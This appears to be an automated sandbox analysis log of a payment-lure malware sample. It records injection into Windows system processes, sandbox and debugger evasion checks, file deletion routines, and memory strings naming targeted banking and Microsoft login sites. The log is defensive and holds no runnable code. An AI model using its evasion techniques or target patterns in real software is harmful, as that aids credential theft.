            Source: Binary string: wntdll.pdb source: PAGO $830.900.exe, 00000000.00000003.2045771670.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, PAGO $830.900.exe, 00000000.00000003.2045918029.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2137653598.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2237383010.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2237383010.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2139562708.0000000003900000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000003.2239500272.0000000003703000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2236327251.000000000355E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4480765561.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4480765561.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.2236959150.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2204810568.000000000341A000.00000004.00000020.00020000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000003.00000002.4479988906.0000000000748000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4479582993.00000000032AE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4481211759.0000000003EDC000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.000000000284C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2631846308.0000000010E8C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4479582993.00000000032AE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4481211759.0000000003EDC000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.000000000284C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2631846308.0000000010E8C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.2236959150.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2204810568.000000000341A000.00000004.00000020.00020000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000003.00000002.4479988906.0000000000748000.00000004.00000020.00020000.00000000.sdmp
            Source: PAGO $830.900.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: PAGO $830.900.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: PAGO $830.900.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: PAGO $830.900.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: PAGO $830.900.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00D7615E GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00D7615E
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00D909F6 push ecx; ret 0_2_00D90A09
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403060 push eax; ret 2_2_00403062
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004160FC push 00000030h; retf 2_2_00416149
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041789B push C5503231h; retf 2_2_004178A3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041613C push 00000030h; retf 2_2_00416149
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040D211 pushad ; ret 2_2_0040D212
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004132A3 push esi; ret 2_2_004132A8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041136F push edi; retf 2_2_00411372
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417CFB push 789F05E2h; iretd 2_2_00417D02
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004135D8 push ds; retf 2_2_004135F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004135E3 push ds; retf 2_2_004135F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00414594 push edi; retf 2_2_004145B7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041E67B push ebp; retf 2_2_0041E67D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041E61E push eax; retf 2_2_0041E647
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041E6DA pushad ; ret 2_2_0041E6DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004016F6 push ss; ret 2_2_00401859
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417FCB push edx; iretd 2_2_00417FCD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401FF6 push ecx; ret 2_2_00401FFF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B309AD push ecx; mov dword ptr [esp], ecx 2_2_03B309B6
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_038B225F pushad ; ret 4_2_038B27F9
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_038B27FA pushad ; ret 4_2_038B27F9
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_038E09AD push ecx; mov dword ptr [esp], ecx 4_2_038E09B6
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_038B283D push eax; iretd 4_2_038B2858
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_038B1368 push eax; iretd 4_2_038B1369
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02D90240 push esi; ret 4_2_02D90245
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02D8E30C push edi; retf 4_2_02D8E30F
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02D90580 push ds; retf 4_2_02D9058D
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02D90575 push ds; retf 4_2_02D9058D
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DA452B push ds; iretd 4_2_02DA454B
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02D94838 push C5503231h; retf 4_2_02D94840
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02D94F68 push edx; iretd 4_2_02D94F6A
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00D8EFAD GetForegroundWindow,FindWindowW,IsIconic,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,ShowWindow, 0_2_00D8EFAD
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00E01B74 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00E01B74
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep graph_0-93497
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | API/Special instruction interceptor: Address: 13C1C8C
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B7096E rdtsc 2_2_03B7096E
            Source: C:\Windows\SysWOW64\netbtugc.exe | Window / User API: threadDelayed 9771
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | API coverage: 4.1 %
            Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exe | API coverage: 2.6 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1532 | Thread sleep count: 201 > 30
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1532 | Thread sleep time: -402000s >= -30000s
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1532 | Thread sleep count: 9771 > 30
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1532 | Thread sleep time: -19542000s >= -30000s
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe TID: 4308 | Thread sleep time: -90000s >= -30000s
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe TID: 4308 | Thread sleep count: 39 > 30
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe TID: 4308 | Thread sleep time: -58500s >= -30000s
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe TID: 4308 | Thread sleep count: 42 > 30
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe TID: 4308 | Thread sleep time: -42000s >= -30000s
            Source: C:\Windows\SysWOW64\netbtugc.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DDDADC lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00DDDADC
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DAC242 FindFirstFileExW, 0_2_00DAC242
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DE68AD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_00DE68AD
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DE680C FindFirstFileW,FindClose, 0_2_00DE680C
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DDCF94 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00DDCF94
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DDD2C7 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00DDD2C7
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DE9560 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00DE9560
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DE96BB SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00DE96BB
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DE9A49 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00DE9A49
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DE5BB5 FindFirstFileW,FindNextFileW,FindClose, 0_2_00DE5BB5
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02D9C2C0 FindFirstFileW,FindNextFileW,FindClose, 4_2_02D9C2C0
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00D7615E GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00D7615E
            Source: 01194HH4.4.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: netbtugc.exe, 00000004.00000002.4483040948.000000000833B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: kers - HKVMware20,11696428
            Source: 01194HH4.4.dr | Binary or memory string: discord.comVMware20,11696428655f
            Source: 01194HH4.4.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 01194HH4.4.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 01194HH4.4.dr | Binary or memory string: global block list test formVMware20,11696428655
            Source: 01194HH4.4.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 01194HH4.4.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 01194HH4.4.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 01194HH4.4.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: netbtugc.exe, 00000004.00000002.4483040948.000000000833B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,116>
            Source: 01194HH4.4.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 01194HH4.4.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 01194HH4.4.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 01194HH4.4.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 01194HH4.4.dr | Binary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 01194HH4.4.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: netbtugc.exe, 00000004.00000002.4479582993.00000000032AE000.00000004.00000020.00020000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480010966.00000000008FF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 01194HH4.4.dr | Binary or memory string: outlook.office.comVMware20,11696428655s
            Source: 01194HH4.4.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 01194HH4.4.dr | Binary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 01194HH4.4.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: netbtugc.exe, 00000004.00000002.4483040948.000000000833B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: language_codeVARCHARkers - HKVMware20,11696428
            Source: firefox.exe, 00000009.00000002.2633469512.000001DAD0F3C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
            Source: 01194HH4.4.dr | Binary or memory string: AMC password management pageVMware20,11696428655
            Source: netbtugc.exe, 00000004.00000002.4483040948.000000000833B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ive Brokers - NDCDYNVMware20,11696428655z
            Source: 01194HH4.4.dr | Binary or memory string: tasks.office.comVMware20,11696428655o
            Source: 01194HH4.4.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 01194HH4.4.dr | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 01194HH4.4.dr | Binary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 01194HH4.4.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 01194HH4.4.dr | Binary or memory string: dev.azure.comVMware20,11696428655j
            Source: 01194HH4.4.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: 01194HH4.4.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: 01194HH4.4.dr | Binary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 01194HH4.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 01194HH4.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B7096E rdtsc
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004172B3 LdrLoadDll
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DEE9C9 BlockInput
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00D7445D GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00D7615E GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00D94C78 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_013C08C8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_013C1F58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_013C1EF8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B663FF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDE3DB mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BEC3CD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB63C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C0634F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2C310 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B50310 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD437C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C08324 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB035C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFA352 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD8350 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C062D6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC62A0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]
